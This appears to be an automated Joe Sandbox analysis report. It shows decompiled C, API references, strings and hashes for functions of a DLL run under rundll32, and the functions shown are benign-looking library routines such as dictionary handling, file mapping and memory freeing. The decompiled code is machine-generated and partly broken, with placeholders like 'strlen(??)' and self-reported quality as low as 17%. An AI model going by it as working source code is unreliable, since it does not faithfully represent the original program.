Opcode ID: fd8ebb722839f17aaf6157ba037008f289ae86b4bf847cb60b004431fafa5101
Instruction ID: eb5494de89beb9ab75199d641261a1b3f1512631375a939401cd0d8990c0213e
Opcode Fuzzy Hash: fd8ebb722839f17aaf6157ba037008f289ae86b4bf847cb60b004431fafa5101
Instruction Fuzzy Hash: BB91F4B4909705DFC710DF68C080A1EBBE0FF89354F55896EE9888B362E735D980EB56

Uniqueness

Uniqueness Score: -1.00%

Function 10011560 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 216
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 17%

			E10011560(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int* _a4, signed int* _a8, signed int _a12, intOrPtr _a16, signed int _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v50;
				void* _v56;
				void* _v60;
				void* _v64;
				intOrPtr _v92;
				signed int _v96;
				signed int* _v100;
				signed int* _v104;
				signed int* _t89;
				signed int* _t98;
				signed int* _t99;
				signed int _t104;
				void* _t105;
				int _t109;
				int _t110;
				void* _t112;
				signed int _t116;
				signed int* _t121;
				signed int _t127;
				int _t129;
				signed int _t130;
				intOrPtr* _t133;
				signed int* _t134;
				void* _t136;
				signed int* _t140;
				signed int* _t142;
				int _t143;
				void* _t144;
				signed int* _t149;
				void* _t150;
				signed int* _t152;
				signed int _t153;
				int _t155;
				signed int _t156;
				void _t158;
				signed int** _t162;
				signed int** _t163;

				_v16 = __ebx;
				_v12 = __esi;
				_v104 = 0x16;
				_t149 =  &_v50;
				 *_t163 = _t149;
				_v92 = _a16;
				_v96 = _a12;
				_v100 = 0x100b1200;
				_v8 = __edi;
				_t140 = _a8;
				_v4 = __ebp;
				E10011040();
				_v60 = 0;
				_t121 =  *_a4;
				 *_t163 = _t149;
				_v56 = 0;
				_t89 = E100267C0(_t121, _t140, _t149, 0);
				_v56 = _t89;
				if(_t140 == 0) {
					_t150 = 0xffffffea;
					L24:
					if(_t121 == 0) {
						L16:
						 *_t163 = _v60;
						L100265B0();
						 *_t163 = _v56;
						L100265B0();
						L17:
						return _t150;
					}
					L15:
					if( *_t121 == 0) {
						 *_t163 =  &(_t121[1]);
						E100265C0();
						 *_t163 = _a4;
						E100265C0();
					}
					goto L16;
				}
				_t162 = 0;
				_t152 = _t89;
				if((_a20 & 0x00000040) == 0) {
					_v104 = _t140;
					_v100 = 0;
					 *_t163 = _t121;
					_v96 = _a20 & 0xfffffff7;
					_t162 = E100110D0();
				}
				if((_a20 & 0x00000004) == 0) {
					 *_t163 = _t140;
					_t98 = E100267C0(_t121, _t140, _t152, _t162);
					_v60 = _t98;
					_t142 = _t98;
					if(_t121 == 0) {
						L19:
						 *_t163 = 8;
						_t99 = E100265E0();
						_t142 = _v60;
						_t121 = _t99;
						 *_a4 = _t121;
						if(_t121 == 0 || _t142 == 0) {
							_t150 = 0xfffffff4;
							goto L24;
						} else {
							L21:
							_t152 = _v56;
							L4:
							if(_t152 == 0) {
								L14:
								_t150 = 0xfffffff4;
								goto L15;
							}
							if(_t162 == 0) {
								_v100 = 8;
								_v104 =  *_t121 + 1;
								 *_t163 = _t121[1];
								_t104 = E100264F0();
								_t153 = _t104;
								if(_t104 == 0) {
									goto L14;
								}
								_t121[1] = _t104;
								_t127 =  *_t121;
								L10:
								_t105 = _v56;
								if(_t105 == 0) {
									if(_t127 == 0) {
										 *_t163 =  &(_t121[1]);
										E100265C0();
										 *_t163 = _a4;
										E100265C0();
									}
									_t150 = 0;
									 *_t163 =  &_v60;
									E100265C0();
								} else {
									_t133 = _t153 + _t127 * 8;
									 *((intOrPtr*)(_t133 + 4)) = _t105;
									 *_t133 = _v60;
									_t150 = 0;
									 *_t121 = _t127 + 1;
								}
								goto L17;
							}
							if((_a20 & 0x00000010) != 0) {
								 *_t163 = _t142;
								_t150 = 0;
								L100265B0();
								 *_t163 = _v56;
								L100265B0();
								goto L17;
							}
							_t134 = _a4;
							 *_t163 = _t134;
							if((_a20 & 0x00000020) != 0) {
								_v64 = _t134;
								_t109 = strlen(??);
								 *_t163 = _t152;
								_t143 = _t109;
								_t110 = strlen(??);
								 *_t163 = _v64;
								_t155 = _t110;
								_t68 = _t110 + 1; // 0x1
								_v104 = _t143 + _t68;
								_t112 = E10026280();
								if(_t112 == 0) {
									goto L14;
								}
								_t70 = _t155 + 1; // 0x1
								_t129 = _t70;
								_t144 = _t143 + _t112;
								_t136 = _v56;
								if(_t129 >= 8) {
									if((_t144 & 0x00000001) != 0) {
										_t130 =  *_t136 & 0x000000ff;
										_t144 = _t144 + 1;
										_t136 = _t136 + 1;
										 *(_t144 - 1) = _t130;
										_t129 = _t155;
									}
									if((_t144 & 0x00000002) != 0) {
										_t156 =  *_t136 & 0x0000ffff;
										_t144 = _t144 + 2;
										_t136 = _t136 + 2;
										_t129 = _t129 - 2;
										 *(_t144 - 2) = _t156;
									}
									if((_t144 & 0x00000004) != 0) {
										_t158 =  *_t136;
										_t144 = _t144 + 4;
										_t136 = _t136 + 4;
										_t129 = _t129 - 4;
										 *(_t144 - 4) = _t158;
									}
								}
								_v64 = _t112;
								memcpy(_t144, _t136, _t129);
								_t163 =  &(_t163[3]);
								 *_t163 =  &_v56;
								E100265C0();
								_v56 = _v64;
								goto L9;
							} else {
								L100265B0();
								L9:
								 *_t163 =  *_t162;
								L100265B0();
								_t116 =  *_t121;
								_t153 = _t121[1];
								_t32 = _t116 - 1; // -1
								_t127 = _t32;
								 *_t121 = _t127;
								 *_t162 =  *(_t153 + _t127 * 8);
								_a4 =  *(_t153 + 4 + _t127 * 8);
								goto L10;
							}
						}
					}
					if(_t98 != 0) {
						goto L21;
					}
					goto L14;
				}
				_v60 = _t140;
				if(_t121 == 0) {
					goto L19;
				}
				goto L4;
			}

0x10011563
0x1001156b
0x10011578
0x1001157c
0x10011580
0x10011583
0x1001158c
0x10011590
0x10011594
0x10011598
0x1001159c
0x100115a2
0x100115ab
0x100115af
0x100115b3
0x100115b6
0x100115ba
0x100115c1
0x100115c5
0x10011758
0x1001175d
0x1001175f
0x10011699
0x1001169d
0x100116a0
0x100116a9
0x100116ac
0x100116b1
0x100116c6
0x100116c6
0x1001168f
0x10011693
0x10011773
0x10011776
0x1001177f
0x10011782
0x10011782
0x00000000
0x10011693
0x100115cb
0x100115cd
0x100115d7
0x100116d0
0x100116dd
0x100116e1
0x100116e7
0x100116f0
0x100116f0
0x100115e5
0x10011670
0x10011673
0x1001167a
0x1001167e
0x10011680
0x10011700
0x10011700
0x10011707
0x1001170c
0x10011710
0x10011718
0x1001171a
0x10011840
0x00000000
0x10011728
0x10011728
0x10011728
0x100115f7
0x100115f9
0x1001168a
0x1001168a
0x00000000
0x1001168a
0x10011601
0x100117b5
0x100117bc
0x100117c3
0x100117c6
0x100117cd
0x100117cf
0x00000000
0x00000000
0x100117d5
0x100117d8
0x10011650
0x10011650
0x10011656
0x10011792
0x10011853
0x10011856
0x1001185f
0x10011862
0x10011862
0x1001179c
0x1001179e
0x100117a1
0x1001165c
0x1001165c
0x10011664
0x10011667
0x10011669
0x1001166b
0x1001166b
0x00000000
0x10011656
0x1001160f
0x10011738
0x1001173b
0x1001173d
0x10011746
0x10011749
0x00000000
0x10011749
0x10011615
0x10011620
0x10011623
0x100117e0
0x100117e4
0x100117e9
0x100117ec
0x100117ee
0x100117f7
0x100117fa
0x100117fc
0x10011800
0x10011804
0x1001180b
0x00000000
0x00000000
0x10011811
0x10011811
0x10011814
0x10011816
0x1001181d
0x10011876
0x10011898
0x1001189b
0x1001189c
0x1001189d
0x100118a0
0x100118a0
0x1001187e
0x100118a4
0x100118a7
0x100118aa
0x100118ad
0x100118b0
0x100118b0
0x10011886
0x10011888
0x1001188a
0x1001188d
0x10011890
0x10011893
0x10011893
0x10011886
0x1001181f
0x10011825
0x10011825
0x1001182b
0x1001182e
0x10011837
0x00000000
0x10011629
0x10011629
0x1001162e
0x10011631
0x10011634
0x10011639
0x1001163b
0x1001163e
0x1001163e
0x10011641
0x1001164a
0x1001164d
0x00000000
0x1001164d
0x10011623
0x1001171a
0x10011684
0x00000000
0x00000000
0x00000000
0x10011684
0x100115eb
0x100115f1
0x00000000
0x00000000
0x00000000

APIs

mv_strdup.MAIN ref: 100115BA

Part of subcall function 100267C0: strlen.MSVCRT ref: 100267DE
Part of subcall function 100267C0: _aligned_realloc.MSVCRT ref: 10026805

mv_strdup.MAIN ref: 10011673
mv_dict_get.MAIN ref: 100116EB
mv_mallocz.MAIN ref: 10011707
mv_freep.MAIN ref: 100117A1
mv_realloc_array.MAIN ref: 100117C6
strlen.MSVCRT ref: 100117E4
strlen.MSVCRT ref: 100117EE
mv_realloc.MAIN ref: 10011804
mv_freep.MAIN ref: 1001182E

Strings

, xrefs: 10011618
%lld, xrefs: 10011587

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: strlen$mv_freepmv_strdup$_aligned_reallocmv_dict_getmv_malloczmv_reallocmv_realloc_array
String ID: $%lld
API String ID: 420417855-3617178099
Opcode ID: d510e7aac1835d2d14d11394022ecc06c06f3c51c024d220679ff3e81abd8013
Instruction ID: 1aac3acce1ec20135028bdf280dbd7ca7379982b25da7d1f386a19304280214e
Opcode Fuzzy Hash: d510e7aac1835d2d14d11394022ecc06c06f3c51c024d220679ff3e81abd8013
Instruction Fuzzy Hash: 0C912AB5909751CBC754DF28C58065EBBE0FF88384F56892DED848B345EB74E884DB82

Uniqueness

Uniqueness Score: -1.00%

Function 100192E0 Relevance: 38.6, APIs: 18, Strings: 4, Instructions: 150
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mvpriv_open.MAIN ref: 1001933F

Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 10019633
Part of subcall function 100195E0: mv_calloc.MAIN ref: 1001964E
Part of subcall function 100195E0: MultiByteToWideChar.KERNEL32 ref: 10019685
Part of subcall function 100195E0: mv_calloc.MAIN ref: 100196D7
Part of subcall function 100195E0: mv_freep.MAIN ref: 10019713
Part of subcall function 100195E0: wcslen.MSVCRT ref: 1001971F
Part of subcall function 100195E0: _wsopen.MSVCRT ref: 1001974B

_fstat64.MSVCRT ref: 10019366
_close.MSVCRT ref: 10019394
_get_osfhandle.MSVCRT ref: 100193C5
CreateFileMappingA.KERNEL32 ref: 100193ED
MapViewOfFile.KERNEL32 ref: 10019422
CloseHandle.KERNEL32 ref: 10019434
mv_log.MAIN ref: 1001945D
_close.MSVCRT ref: 10019465
_errno.MSVCRT ref: 10019480
mv_strerror.MAIN ref: 100194A1
mv_log.MAIN ref: 100194C7
_errno.MSVCRT ref: 100194D8
mv_strerror.MAIN ref: 100194FE
mv_log.MAIN ref: 1001951B
_close.MSVCRT ref: 10019523
mv_log.MAIN ref: 1001954F
_close.MSVCRT ref: 10019557

Strings

File size for file '%s' is too big, xrefs: 10019535
Cannot read file '%s': %s, xrefs: 100194A6
Error occurred in fstat(): %s, xrefs: 1001950B
Error occurred in CreateFileMapping(), xrefs: 10019561

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _closemv_log$ByteCharFileMultiWide_errnomv_callocmv_strerror$CloseCreateHandleMappingView_fstat64_get_osfhandle_wsopenmv_freepmvpriv_openwcslen
String ID: Cannot read file '%s': %s$Error occurred in CreateFileMapping()$Error occurred in fstat(): %s$File size for file '%s' is too big
API String ID: 2213036534-2445208470
Opcode ID: 115248d222d0207b4b6978023f43e634846f62dc27148f7a7cd2e032391e2a57
Instruction ID: 617e9db2a449c1ebb97318d6d46501e643e1f1538bb2456b081f200f3c68d203
Opcode Fuzzy Hash: 115248d222d0207b4b6978023f43e634846f62dc27148f7a7cd2e032391e2a57
Instruction Fuzzy Hash: 6861C0B59097459FC310EF29C48529EFBE4FF88700F41892EE9D98B351E774E9809B82

Uniqueness

Uniqueness Score: -1.00%

Function 10012850 Relevance: 37.7, APIs: 25, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E10012850(intOrPtr* __eax) {
				intOrPtr _t65;
				intOrPtr _t82;
				intOrPtr _t84;
				intOrPtr _t86;
				intOrPtr _t88;
				intOrPtr _t90;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				intOrPtr* _t98;
				intOrPtr* _t102;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t109;
				void* _t110;
				intOrPtr* _t111;

				_t107 = __eax;
				_t111 = _t110 - 0x2c;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					_t96 = 0;
					do {
						_t90 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 8)) + _t96 * 4));
						_t96 = _t96 + 1;
						 *_t111 = _t90;
						L100265B0();
					} while (_t96 <  *((intOrPtr*)(__eax + 0xc)));
				}
				_t106 =  *((intOrPtr*)(_t107 + 0x1c));
				if(_t106 != 0) {
					if( *((intOrPtr*)(_t106 + 0xc)) != 0) {
						_t95 = 0;
						do {
							_t88 =  *((intOrPtr*)( *((intOrPtr*)(_t106 + 8)) + _t95 * 4));
							_t95 = _t95 + 1;
							 *_t111 = _t88;
							L100265B0();
						} while (_t95 <  *((intOrPtr*)(_t106 + 0xc)));
					}
					_t109 =  *((intOrPtr*)(_t106 + 0x1c));
					if(_t109 != 0) {
						if( *((intOrPtr*)(_t109 + 0xc)) != 0) {
							_t94 = 0;
							do {
								_t86 =  *((intOrPtr*)( *((intOrPtr*)(_t109 + 8)) + _t94 * 4));
								_t94 = _t94 + 1;
								 *_t111 = _t86;
								L100265B0();
							} while (_t94 <  *((intOrPtr*)(_t109 + 0xc)));
						}
						_t102 =  *((intOrPtr*)(_t109 + 0x1c));
						if(_t102 != 0) {
							if( *((intOrPtr*)(_t102 + 0xc)) != 0) {
								_t93 = 0;
								do {
									 *((intOrPtr*)(_t111 + 0x18)) = _t102;
									_t84 =  *((intOrPtr*)( *((intOrPtr*)(_t102 + 8)) + _t93 * 4));
									_t93 = _t93 + 1;
									 *_t111 = _t84;
									L100265B0();
									_t102 =  *((intOrPtr*)(_t111 + 0x18));
								} while (_t93 <  *((intOrPtr*)(_t102 + 0xc)));
							}
							_t98 =  *((intOrPtr*)(_t102 + 0x1c));
							if(_t98 != 0) {
								if( *((intOrPtr*)(_t98 + 0xc)) != 0) {
									_t92 = 0;
									do {
										 *((intOrPtr*)(_t111 + 0x1c)) = _t102;
										 *((intOrPtr*)(_t111 + 0x18)) = _t98;
										_t82 =  *((intOrPtr*)( *((intOrPtr*)(_t98 + 8)) + _t92 * 4));
										_t92 = _t92 + 1;
										 *_t111 = _t82;
										L100265B0();
										_t98 =  *((intOrPtr*)(_t111 + 0x18));
										_t102 =  *((intOrPtr*)(_t111 + 0x1c));
									} while (_t92 <  *((intOrPtr*)(_t98 + 0xc)));
								}
								_t76 =  *((intOrPtr*)(_t98 + 0x1c));
								if( *((intOrPtr*)(_t98 + 0x1c)) != 0) {
									 *((intOrPtr*)(_t111 + 0x1c)) = _t98;
									 *((intOrPtr*)(_t111 + 0x18)) = _t102;
									E10012850(_t76);
									_t98 =  *((intOrPtr*)(_t111 + 0x1c));
									_t102 =  *((intOrPtr*)(_t111 + 0x18));
								}
								 *((intOrPtr*)(_t111 + 0x1c)) = _t102;
								 *((intOrPtr*)(_t111 + 0x18)) = _t98;
								 *_t111 =  *_t98;
								L100265B0();
								 *_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)) + 8));
								L100265B0();
								 *_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)) + 0x14));
								L100265B0();
								 *_t111 =  *((intOrPtr*)(_t111 + 0x18));
								L100265B0();
								_t102 =  *((intOrPtr*)(_t111 + 0x1c));
							}
							 *((intOrPtr*)(_t111 + 0x18)) = _t102;
							 *_t111 =  *_t102;
							L100265B0();
							 *_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)) + 8));
							L100265B0();
							 *_t111 =  *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x18)) + 0x14));
							L100265B0();
							 *_t111 =  *((intOrPtr*)(_t111 + 0x18));
							L100265B0();
						}
						 *_t111 =  *_t109;
						L100265B0();
						 *_t111 =  *((intOrPtr*)(_t109 + 8));
						L100265B0();
						 *_t111 =  *((intOrPtr*)(_t109 + 0x14));
						L100265B0();
						 *_t111 = _t109;
						L100265B0();
					}
					 *_t111 =  *_t106;
					L100265B0();
					 *_t111 =  *((intOrPtr*)(_t106 + 8));
					L100265B0();
					 *_t111 =  *((intOrPtr*)(_t106 + 0x14));
					L100265B0();
					 *_t111 = _t106;
					L100265B0();
				}
				 *_t111 =  *_t107;
				L100265B0();
				 *_t111 =  *((intOrPtr*)(_t107 + 8));
				L100265B0();
				_t65 =  *((intOrPtr*)(_t107 + 0x14));
				 *_t111 = _t65;
				L100265B0();
				 *_t111 = _t107;
				L100265B0();
				return _t65;
			}

0x10012853
0x10012856
0x1001285e
0x10012860
0x10012870
0x10012873
0x10012876
0x10012877
0x1001287a
0x1001287f
0x10012870
0x10012884
0x10012889
0x10012894
0x10012896
0x100128a0
0x100128a3
0x100128a6
0x100128a7
0x100128aa
0x100128af
0x100128a0
0x100128b4
0x100128b9
0x100128c4
0x100128c6
0x100128d0
0x100128d3
0x100128d6
0x100128d7
0x100128da
0x100128df
0x100128d0
0x100128e4
0x100128e9
0x100128f4
0x100128f6
0x10012900
0x10012900
0x10012907
0x1001290a
0x1001290b
0x1001290e
0x10012913
0x10012917
0x10012900
0x1001291c
0x10012921
0x1001292c
0x1001292e
0x10012930
0x10012930
0x10012937
0x1001293b
0x1001293e
0x1001293f
0x10012942
0x10012947
0x1001294b
0x1001294f
0x10012930
0x10012954
0x10012959
0x1001295b
0x1001295f
0x10012963
0x10012968
0x1001296c
0x1001296c
0x10012970
0x10012976
0x1001297a
0x1001297d
0x10012989
0x1001298c
0x10012998
0x1001299b
0x100129a4
0x100129a7
0x100129ac
0x100129ac
0x100129b0
0x100129b6
0x100129b9
0x100129c5
0x100129c8
0x100129d4
0x100129d7
0x100129e0
0x100129e3
0x100129e3
0x100129eb
0x100129ee
0x100129f6
0x100129f9
0x10012a01
0x10012a04
0x10012a09
0x10012a0c
0x10012a0c
0x10012a13
0x10012a16
0x10012a1e
0x10012a21
0x10012a29
0x10012a2c
0x10012a31
0x10012a34
0x10012a34
0x10012a3b
0x10012a3e
0x10012a46
0x10012a49
0x10012a4e
0x10012a51
0x10012a54
0x10012a59
0x10012a5c
0x10012a68

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de691f1ba13835e21657e86075408ec6b0dc09785dc25b7b1d0ef4953b892b6e
Instruction ID: 2f248bfe3db45479d33083a71d7c86b86264631c37f86e05a0edac7835ee7c2e
Opcode Fuzzy Hash: de691f1ba13835e21657e86075408ec6b0dc09785dc25b7b1d0ef4953b892b6e
Instruction Fuzzy Hash: 2A6192B8A04B558FC704EF69D4C191AB7E0FF48254F51891CE9948B31AEB30F896CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 100296D4 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 221
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

mv_freep.MAIN ref: 100296DC
mv_freep.MAIN ref: 100296E8
mv_freep.MAIN ref: 10029721
mv_freep.MAIN ref: 1002972D
mv_log.MAIN ref: 1002977B

Strings

%d/%d, xrefs: 10029A8B
(default , xrefs: 10029762
%lld, xrefs: 10029876
%-15s , xrefs: 100292D4
"%s", xrefs: 100297AF

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_freep$mv_log
String ID: %-15s $ (default $"%s"$%d/%d$%lld
API String ID: 2749705325-3616743394
Opcode ID: 29b06a4c8fc90e14002c87a4c6f33f06bcf76f627d83655d7f8131f9e1fae942
Instruction ID: a78736eaf865b939ee6902c1b70fed4f9ad85332988bb7fcaf3499c0514d5393
Opcode Fuzzy Hash: 29b06a4c8fc90e14002c87a4c6f33f06bcf76f627d83655d7f8131f9e1fae942
Instruction Fuzzy Hash: D191AF78A087459FC750DF28E48065EFBE1FF89780F91892EF8998B351E774E9418B42

Uniqueness

Uniqueness Score: -1.00%

Function 10011210 Relevance: 30.2, APIs: 20, Instructions: 223
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E10011210(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int _a4, signed int _a8, void* _a12, signed int _a16) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v32;
				void* _v36;
				int _v48;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _t94;
				signed int* _t95;
				signed int _t101;
				signed int _t102;
				signed int _t104;
				signed int _t106;
				int _t108;
				int _t109;
				int _t111;
				signed int* _t118;
				int _t122;
				signed int _t123;
				int _t126;
				signed int _t127;
				signed int* _t130;
				int _t133;
				signed int _t134;
				void _t136;
				signed int _t138;
				void* _t142;
				signed int _t146;
				void* _t147;
				signed int _t149;
				signed int _t150;
				int _t153;
				void* _t154;
				signed int* _t157;
				signed int* _t158;

				_v8 = __edi;
				_v16 = __ebx;
				_t138 = _a16;
				_v12 = __esi;
				_t146 = _a8;
				_v4 = __ebp;
				_t118 =  *_a4;
				_v36 = 0;
				_v32 = 0;
				if((_t138 & 0x00000008) == 0) {
					if(_a12 == 0) {
						goto L2;
					}
					 *_t158 = _a12;
					_v32 = E100267C0(_t118, _t138, _t146, __ebp);
					if(_t146 != 0) {
						goto L3;
					}
					goto L22;
				} else {
					_v32 = _a12;
					L2:
					if(_t146 == 0) {
						L22:
						_t147 = 0xffffffea;
						L23:
						if(_t118 == 0) {
							L10:
							 *_t158 = _v36;
							L100265B0();
							 *_t158 = _v32;
							L100265B0();
							L11:
							return _t147;
						}
						L9:
						if( *_t118 == 0) {
							 *_t158 =  &(_t118[1]);
							E100265C0();
							 *_t158 = _a4;
							E100265C0();
						}
						goto L10;
					}
					L3:
					_t157 = 0;
					if((_t138 & 0x00000040) == 0) {
						_v64 = _t138;
						_v68 = 0;
						_v72 = _t146;
						 *_t158 = _t118;
						_t157 = E100110D0();
					}
					if((_t138 & 0x00000004) == 0) {
						 *_t158 = _t146;
						_t94 = E100267C0(_t118, _t138, _t146, _t157);
						_v36 = _t94;
						_t149 = _t94;
						if(_t118 == 0) {
							goto L29;
						}
						if(_t94 == 0) {
							goto L8;
						}
						goto L6;
					} else {
						_v36 = _t146;
						if(_t118 == 0) {
							L29:
							 *_t158 = 8;
							_t95 = E100265E0();
							_t149 = _v36;
							_t118 = _t95;
							 *_a4 = _t118;
							if(_t118 == 0 || _t149 == 0) {
								_t147 = 0xfffffff4;
								goto L23;
							} else {
								goto L6;
							}
						}
						L6:
						_t122 = _v32;
						if(_a12 == 0 || _t122 != 0) {
							if(_t157 == 0) {
								_t150 =  *_t118;
								if(_t122 == 0) {
									L37:
									if(_t150 == 0) {
										 *_t158 =  &(_t118[1]);
										E100265C0();
										 *_t158 = _a4;
										E100265C0();
									}
									_t147 = 0;
									 *_t158 =  &_v36;
									E100265C0();
									goto L11;
								}
								_v68 = 8;
								_v72 = _t150 + 1;
								 *_t158 = _t118[1];
								_t101 = E100264F0();
								_t123 = _t101;
								if(_t101 == 0) {
									goto L8;
								}
								_t118[1] = _t101;
								_t150 =  *_t118;
								L18:
								_t102 = _v32;
								if(_t102 == 0) {
									goto L37;
								}
								_t130 = _t123 + _t150 * 8;
								_t130[1] = _t102;
								 *_t130 = _v36;
								 *_t118 = _t150 + 1;
								_t147 = 0;
								goto L11;
							}
							if((_t138 & 0x00000010) != 0) {
								 *_t158 = _t149;
								_t147 = 0;
								L100265B0();
								 *_t158 = _v32;
								L100265B0();
								goto L11;
							}
							_t104 = _a4;
							if(_t122 == 0 || (_t138 & 0x00000020) == 0) {
								 *_t158 = _t104;
								L100265B0();
								goto L17;
							} else {
								 *_t158 = _t104;
								_v48 = _t122;
								_t108 = strlen(??);
								 *_t158 = _v48;
								_t153 = _t108;
								_t109 = strlen(??);
								 *_t158 = _t104;
								_v48 = _t109;
								_t63 = _t109 + 1; // 0x1
								_v72 = _t153 + _t63;
								_t111 = E10026280();
								if(_t111 == 0) {
									goto L8;
								}
								_t133 = _v48;
								_t142 = _t111 + _t153;
								_t154 = _v32;
								_t126 = _t133 + 1;
								if(_t126 >= 8) {
									if((_t142 & 0x00000001) != 0) {
										_t127 =  *_t154 & 0x000000ff;
										_t142 = _t142 + 1;
										_t154 = _t154 + 1;
										 *(_t142 - 1) = _t127;
										_t126 = _t133;
									}
									if((_t142 & 0x00000002) != 0) {
										_t134 =  *_t154 & 0x0000ffff;
										_t142 = _t142 + 2;
										_t154 = _t154 + 2;
										_t126 = _t126 - 2;
										 *(_t142 - 2) = _t134;
									}
									if((_t142 & 0x00000004) != 0) {
										_t136 =  *_t154;
										_t142 = _t142 + 4;
										_t154 = _t154 + 4;
										_t126 = _t126 - 4;
										 *(_t142 - 4) = _t136;
									}
								}
								_v48 = _t111;
								memcpy(_t142, _t154, _t126);
								_t158 =  &(_t158[3]);
								 *_t158 =  &_v32;
								E100265C0();
								_v32 = _v48;
								L17:
								 *_t158 =  *_t157;
								L100265B0();
								_t106 =  *_t118;
								_t123 = _t118[1];
								_t31 = _t106 - 1; // -1
								_t150 = _t31;
								 *_t118 = _t150;
								 *_t157 =  *(_t123 + _t150 * 8);
								_a4 =  *(_t123 + 4 + _t150 * 8);
								goto L18;
							}
						} else {
							L8:
							_t147 = 0xfffffff4;
							goto L9;
						}
					}
				}
			}

0x10011213
0x1001121b
0x1001121f
